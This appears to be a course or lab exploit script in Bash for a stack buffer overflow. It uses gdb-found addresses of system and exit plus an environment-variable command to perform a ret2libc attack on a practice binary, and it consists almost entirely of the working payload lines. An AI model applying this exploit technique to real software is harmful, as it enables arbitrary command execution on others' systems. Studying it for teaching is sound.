29 lines
1.2 KiB
Bash
Executable file
29 lines
1.2 KiB
Bash
Executable file
#!/bin/bash
|
|
|
|
##### Exploit Creation Steps #####
|
|
###################################
|
|
|
|
# Step 1: Find the addresses of 'system' and 'exit' functions using gdb
|
|
# Commands:
|
|
# p system -> 0xf7e15360
|
|
# p exit -> 0xf7e07ec0
|
|
|
|
# Step 2: Export an environment variable to inject our command as a string into the ret2libc executable
|
|
# Command: export COMMAND="echo 100 > /home/user/t0p_s3cr3t/owned"
|
|
|
|
# Step 3: Find the address of the environment variable string in memory using gdb
|
|
# Command: x/s *((char **)environ+16) (17th env. variable)
|
|
# Add 8 to the address to skip the 'COMMAND=' part
|
|
# -> 0xffffdeda (0xffffdee8 in gdb; different env. vars when executing ./ret2libc directly; found by trial and error)
|
|
###################################
|
|
|
|
############ Exploit ##############
|
|
# Fill the buffer with 'A's until the stored EIP is reached
|
|
printf "A%.0s" {1..112}
|
|
|
|
# Overwrite the stored EIP with the address of the 'system' function
|
|
# Place the address of the 'exit' function as the return address for 'system'
|
|
# Provide the argument for 'system', which is the address of the value of the environment variable COMMAND
|
|
# All addresses are in little-endian format
|
|
printf "\x60\x53\xe1\xf7\xc0\x7e\xe0\xf7\xda\xde\xff\xff"
|
|
###################################
|